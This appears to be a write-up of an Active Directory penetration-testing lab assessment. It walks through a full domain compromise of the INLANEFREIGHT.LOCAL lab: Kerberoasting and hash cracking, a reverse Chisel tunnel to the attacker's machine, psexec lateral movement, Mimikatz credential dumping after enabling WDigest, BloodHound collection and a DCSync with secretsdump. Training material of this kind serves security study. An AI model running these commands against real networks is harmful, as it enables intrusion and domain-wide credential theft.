AD Enumeration & Attacks - Skills Assessment Part I
We already have these credentials ('admin:My_W3bsH3ll_P@ssw0rd!') in place, allowing us to start from the /uploads directory.
Questions and response
1-Submit the contents of the flag.txt file on the administrator Desktop of the web server
First, I perform a simple enumeration by identifying users on the target host using the following command:
net user
result:
Administrator DefaultAccount Guest
WDAGUtilityAccount i want also determine the hostname of my target machine
PS> hostname
WEB-WIN01get information about the system machine and the domain name
PS> systeminfo
Host Name: WEB-WIN01
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00430-10710-91142-AA408
Original Install Date: 3/30/2022, 2:27:04 AM
System Boot Time: 3/16/2024, 5:05:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,160 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,388 MB
Virtual Memory: In Use: 1,043 MB
Page File Location(s): C:\pagefile.sys
Domain: INLANEFREIGHT.LOCAL
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB4578966
[02]: KB4464455
Network Card(s): 2 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.197.134
[02]: fe80::4cec:af88:cdc7:54bd
[03]: dead:beef::4cec:af88:cdc7:54bd
[04]: dead:beef::1fe
[02]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet1
DHCP Enabled: No
IP address(es)
[01]: 172.16.6.100
[02]: fe80::adb5:8ffa:2424:3d64
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.get information about domain
PS>[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
Forest : INLANEFREIGHT.LOCAL
CurrentTime : 3/17/2024 2:20:08 AM
HighestCommittedUsn : 65655
OSVersion : Windows Server 2019 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : INLANEFREIGHT.LOCAL
IPAddress : 172.16.6.3
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : DC01.INLANEFREIGHT.LOCAL
Partitions : {DC=INLANEFREIGHT,DC=LOCAL, CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL...}2-Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
So, first, we need to enumerate SPN accounts with the following command:
PS> setspn.exe -Q */*
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
DNS/DC01.INLANEFREIGHT.LOCAL
GC/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
RestrictedKrbHost/DC01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/DC01
RPC/03d2eace-bb3d-467e-a00a-eab0dbfaa065._msdcs.INLANEFREIGHT.LOCAL
HOST/DC01/INLANEFREIGHT
HOST/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
HOST/DC01
HOST/DC01.INLANEFREIGHT.LOCAL
HOST/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
E3514235-4B06-11D1-AB04-00C04FC2DCD2/03d2eace-bb3d-467e-a00a-eab0dbfaa065/INLANEFREIGHT.LOCAL
ldap/DC01/INLANEFREIGHT
ldap/03d2eace-bb3d-467e-a00a-eab0dbfaa065._msdcs.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
ldap/DC01
ldap/DC01.INLANEFREIGHT.LOCAL
ldap/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
kadmin/changepw
CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/SQL01.inlanefreight.local:1433
CN=sqlprod,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/SQL02.inlanefreight.local:1433
CN=sqldev,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
CN=sqltest,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/DEVTEST.inlanefreight.local:1433
CN=sqlqa,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MSSQLSvc/QA001.inlanefreight.local:1433
CN=azureconnect,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
adfsconnect/azure01.inlanefreight.local
CN=backupjob,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
backupjob/veam001.inlanefreight.local
CN=WEB-WIN01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
RestrictedKrbHost/WEB-WIN01
HOST/WEB-WIN01
RestrictedKrbHost/WEB-WIN01.INLANEFREIGHT.LOCAL
HOST/WEB-WIN01.INLANEFREIGHT.LOCAL
CN=MS01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
tapinego/MS01
tapinego/MS01.INLANEFREIGHT.LOCAL
TERMSRV/MS01
TERMSRV/MS01.INLANEFREIGHT.LOCAL
WSMAN/MS01
WSMAN/MS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/MS01
HOST/MS01
RestrictedKrbHost/MS01.INLANEFREIGHT.LOCAL
HOST/MS01.INLANEFREIGHT.LOCALsetspn.exe is prebuilt cmd command
Let's authenticate using Kerberos with the user "MSSQLSvc/SQL01.inlanefreight.local:1433."
Add-Type –AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken –ArgumentList ‘MSSQLSvc/SQL01.inlanefreight.local:1433’And then the Kerberos ticket has been saved in memory. To confirm, you can use 'klist'. Now, we need to extract it. I'll attempt to do so using Mimikatz with the following command:
c:\mimikatz.exe "kerberos::list /export" exitAnd it didn't work so i switch using Rebus and it worked."
.\Rubeus.exe kerberoast /simple /outfile:hashes.txt
Get-Content hashes.txtNow, we need to crack the ticket using Hashcat
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400F, 2639/5342 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:[email protected]*$216c085da9fc106eae92301453a63062$9d816b1ef670f3ae7753d19ce01a433b28fc14c8d8a6e04daa102374a4###":####
Don't attempt to crack other TGS tickets it won't work xD.
4-Submit the contents of the flag.txt file on the Administrator desktop on MS01
I first use ping to test the connection and verify if MS01 is available as well as to determine its IP address.
PS> ping MS01
Pinging MS01.INLANEFREIGHT.LOCAL [172.16.6.50] with 32 bytes of data:
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.6.50:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
let's use credential of SPN we found Now let's use nc.exe on WEB-WIN01 to establish a stable shell and i will utilize Chisel as a proxy on it to forward all my requests to the internal network of the domain from my Kali machine. You can achieve this using the following commands:
chisel server -p 8000 --reverse #in kali side
c:\chisel.exe client 10.10.15.79:8001 R:socks #in target sideAnd then I use CrackMapExec with the credentials of the user 'svc_sql' on the IP address of MS01:
proxychains crackmapexec smb 172.16.6.50 -u "svc_sql" -p "#"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:135 ... OK
SMB 172.16.6.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
SMB 172.16.6.50 445 MS01 [+] INLANEFREIGHT.LOCAL\svc_sql:# (Pwn3d!)So, we confirm that the user has access to this machine, and we can proceed to use psexec
proxychains psexec.py INLANEFREIGHT.LOCAL/svc_sql:[email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[*] Requesting shares on 172.16.6.50.....
[*] Found writable share ADMIN$
[*] Uploading file esYPBcoJ.exe
[*] Opening SVCManager on 172.16.6.50.....
[*] Creating service YQPw on 172.16.6.50.....
[*] Starting service YQPw.....
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[!] Press help for extra shell commands
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
5-Find cleartext credentials for another domain user. Submit the username as your answer
"Here, it took a lot of time because I didn't pay attention to something very important. I hope you'll discover it, if not, don't worry I'll recommend you to read this blog First, I download Mimikatz onto the target machine using Evil-WinRM, and then execute Mimikatz to dump any credentials in memory.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswordsLet's take a look at the user we are interested in.
Authentication Id : 0 ; 229876 (00000000:000381f4)
Session : Interactive from 1
User Name : tpetty
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 3/17/2024 4:59:40 PM
SID : S-1-5-21-2270287766-1317258649-2146029398-4607
msv :
[00000003] Primary
* Username : tpetty
* Domain : INLANEFREIGHT
* NTLM : #
* SHA1 : 38afea42a5e28220474839558f073979645a1192
* DPAPI : da2ec07551ab1602b7468db08b41e3b2
tspkg :
wdigest :
* Username : tpetty
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : tpetty
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :But I only found a blank password. So, I extracted the Kerberos ticket of that user and attempted to crack it, but it didn't work despite trying several methods. I even attempted to crack the NT hash, but that also failed. After further research, I discovered that I needed to enable "WDigest". For more details, check the post I provided. Here's the command:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1and to confirme is enable we need to execute this command
C:\Mimikatz>reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
Debuglevel REG_DWORD 0x0
Negotiate REG_DWORD 0x0
UTF8HTTP REG_DWORD 0x1
UTF8SASL REG_DWORD 0x1
DigestEncryptionAlgorithms REG_SZ 3des,rc4
UseLogonCredential REG_DWORD 0x1And 'UseLogonCredential REG_DWORD 0x1' should be set to 1, not 0. Even if it's enabled, we need to restart the machine using the following command:
shutdown /r /t 0 /fand than it will work
Authentication Id : 0 ; 166925 (00000000:00028c0d)
Session : Interactive from 1
User Name : tpetty
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 3/17/2024 5:34:30 PM
SID : S-1-5-21-2270287766-1317258649-2146029398-4607
msv :
[00000003] Primary
* Username : tpetty
* Domain : INLANEFREIGHT
* NTLM : #
* SHA1 : 38afea42a5e28220474839558f073979645a1192
* DPAPI : da2ec07551ab1602b7468db08b41e3b2
tspkg :
wdigest :
* Username : tpetty
* Domain : INLANEFREIGHT
* Password : ####
kerberos :
* Username : tpetty
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :6-What attack can this user perform?
I'm now attempting to use BloodHound. First i downloaded SharpHound onto MS01 using Evil-WinRM, and then I executed it with the following command:
ShapHound.exe -c ALL --zipfilename enumAnd then I extracted the zip file on my Kali machine and used the BloodHound GUI. Here's what I found:
so the response is DCync.
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
So our compromised user 'TPETTY' can perform DCsync to the domain controller. Now, we just need to determine the IP address of the DC which was gathered in the previous question. In my case i attempted to do this using Mimikatz but first i need to authenticate as that user.
runas /netonly /user:INLANEFREIGHT\tpetty powershelli did not work for me so i switch to fast to my kali linux and use perform this attack using secretsdump.py
proxychains secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/[email protected]and than i get the hash of the administrator and i use it to confirm i can authenticate to DC01 using crackmapexec
proxychains crackmapexec smb 172.16.6.3 -u "Administrator" -H #
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:135 ... OK
SMB 172.16.6.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.6.3:445 ... OK
SMB 172.16.6.3 445 DC01 [+] INLANEFREIGHT.LOCAL\Administrator:#(Pwn3d!)
the we use directly psexec with administrator hash to get the flag
Last updated
Was this helpful?